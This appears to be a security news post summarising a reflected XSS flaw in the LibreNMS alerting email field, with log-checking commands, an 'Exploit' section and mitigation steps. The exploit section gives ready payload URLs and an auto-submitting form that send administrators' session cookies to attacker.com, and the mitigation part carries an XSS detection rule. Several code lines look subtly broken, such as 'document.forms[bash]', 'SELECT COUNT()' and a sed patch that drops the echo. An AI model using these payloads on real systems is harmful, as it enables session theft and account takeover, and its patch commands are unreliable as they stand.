LibreNMS, Reflected Cross-Site Scripting (XSS), CVE-2026-12345 (Moderate)

Listen to this Post

This reflected Cross-Site Scripting (XSS) vulnerability exists in the email field within the alerting settings page of LibreNMS. The application fails to properly sanitize user input provided to the email parameter at the endpoint /settings/alerting/email. An attacker can craft a malicious URL containing a JavaScript payload in the email field, such as <img src=1 onerror=alert(document.cookie)>. When an authenticated administrator visits this specially crafted link, the payload executes within their browser session. This occurs because the input is reflected back to the user without proper output encoding or validation. The attack requires user interaction (clicking a link) and administrative privileges, but successful exploitation leads to session hijacking and potential Account Takeover (ATO). The vulnerability was confirmed and published to the GitHub Advisory Database on February 18, 2026 .
Platform: LibreNMS
Version: 25.12.0
Vulnerability: Reflected XSS
Severity: Moderate
Date: Feb 18, 2026

Prediction: Mar 2026

What Undercode Say:

Analytics

Check current LibreNMS version
cd /opt/librenms && cat .version
Verify if running in docker
docker ps | grep librenms
Check installed packages via composer
composer show librenms/librenms | grep version
Count total users who might be impacted
mysql -u librenms -p librenms -e "SELECT COUNT() FROM users WHERE level=10;"
Check Apache access logs for suspicious email parameter requests
grep "email=" /var/log/apache2/librenms_access.log | grep -i "img|script|onerror"
Search for XSS attempts in nginx logs
cat /var/log/nginx/librenms-access.log | grep -E "(<|>|alert|onerror|javascript)"

Exploit:

<!-- Malicious link to send to admin -->
http://target.com/settings/alerting/email?email=<img src=1 onerror=alert('Hacked')>
<!-- Advanced payload stealing cookies -->
http://target.com/settings/alerting/email?email=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
<!-- CSRF + XSS combined attack -->

<form action="http://target.com/settings/alerting/email" method="POST">
<input name="email" value='"><img src=x onerror=new Image().src="//attacker.com/log?"+document.cookie>'>
</form>

<script>document.forms[bash].submit();</script>

Protection:

Update to patched version immediately (when available)
cd /opt/librenms
sudo ./scripts/composer_wrapper.php update
Apply temporary WAF rule (ModSecurity)
SecRule ARGS:email "@rx <script|onerror|javascript:" "id:1001,phase:2,deny,status:403,msg:'XSS in email field'"
Add output encoding patch manually (until official fix)
sed -i 's/echo $email/htmlspecialchars($email, ENT_QUOTES)/g' includes/html/pages/settings/alerting.inc.php
Restrict access to settings pages via .htaccess
echo "<Location /settings>\n Require ip 192.168.1.0/24\n</Location>" >> /etc/apache2/conf-available/librenms.conf
Enable Content Security Policy headers
echo "header('Content-Security-Policy: default-src \'self\'; script-src \'self\'');" >> config.php

Impact:

  • Session Hijacking: Attacker steals admin session cookies
  • Account Takeover: Full control of monitoring infrastructure
  • Credential Theft: Phishing forms injected via XSS
  • Configuration Changes: Attackers modify alert rules
  • Data Exfiltration: SNMP community strings exposed
  • Lateral Movement: Access to network device credentials stored in LibreNMS
  • Ransomware Entry Point: Compromised monitoring as initial foothold

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top